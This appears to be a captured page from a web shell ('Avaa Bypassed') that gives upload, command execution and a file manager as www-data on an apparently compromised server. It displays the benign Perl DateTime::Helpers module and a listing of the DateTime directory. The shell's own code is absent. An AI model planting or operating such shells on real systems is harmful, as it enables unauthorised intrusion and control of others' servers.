[ Avaa Bypassed ]




Upload:

Command:

www-data@3.143.211.215: ~ $
package DateTime::Helpers;

use strict;
use warnings;

our $VERSION = '1.51';

use Scalar::Util ();

sub can {
    my $object = shift;
    my $method = shift;

    return unless Scalar::Util::blessed($object);
    return $object->can($method);
}

sub isa {
    my $object = shift;
    my $method = shift;

    return unless Scalar::Util::blessed($object);
    return $object->isa($method);
}

1;

Filemanager

Name Type Size Permission Actions
Conflicts.pm File 907 B 0644
Duration.pm File 18.51 KB 0644
Helpers.pm File 396 B 0644
Infinite.pm File 5.93 KB 0644
LeapSecond.pm File 4.72 KB 0644
PP.pm File 5.42 KB 0644
PPExtra.pm File 1.69 KB 0644
Types.pm File 3.66 KB 0644